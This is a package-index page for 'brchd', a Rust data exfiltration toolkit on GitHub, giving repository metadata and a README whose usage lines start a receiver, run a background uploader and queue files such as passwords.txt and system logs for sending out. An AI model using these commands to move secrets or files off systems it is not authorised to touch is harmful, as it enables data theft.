https://github.com/kpcyrd/brchd
Data exfiltration toolkit
https://github.com/kpcyrd/brchd
exfiltration
Last synced: 3 months ago
JSON representation
Data exfiltration toolkit
- Host: GitHub
- URL: https://github.com/kpcyrd/brchd
- Owner: kpcyrd
- License: gpl-3.0
- Created: 2020-03-21T20:22:58.000Z (over 5 years ago)
- Default Branch: main
- Last Pushed: 2020-11-22T16:00:18.000Z (over 4 years ago)
- Last Synced: 2025-04-14T14:23:02.966Z (3 months ago)
- Topics: exfiltration
- Language: Rust
- Homepage:
- Size: 413 KB
- Stars: 13
- Watchers: 3
- Forks: 2
- Open Issues: 4
-
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
- License: LICENSE
Awesome Lists containing this project
README
# brchd
## Starting the receiver somewhere
brchd -Hd drop/
## Run the background uploader
brchd -vDd http://127.0.0.1:7070
## Manage uploads
brchd passwords.txt
brchd imgs/
brchd /var/log/*.log
brchd # attaches status monitor
brchd --wait # blocks until all pending uploads are done## Run as standalone spider
brchd -d ./download/ https://ftp.example.com/some/folder/
## Install dependencies
apt install pkg-config libsodium-dev
pacman -S pkg-config libsodium
brew install pkg-config libsodium## Windows
There's basic windows support. You need to force a statically linked libsodium
with:cargo build --release --no-default-features --features=crypto,httpd,spider,native-tls
Running the receiver (`-H`) on windows is considered insecure and highly
discouraged.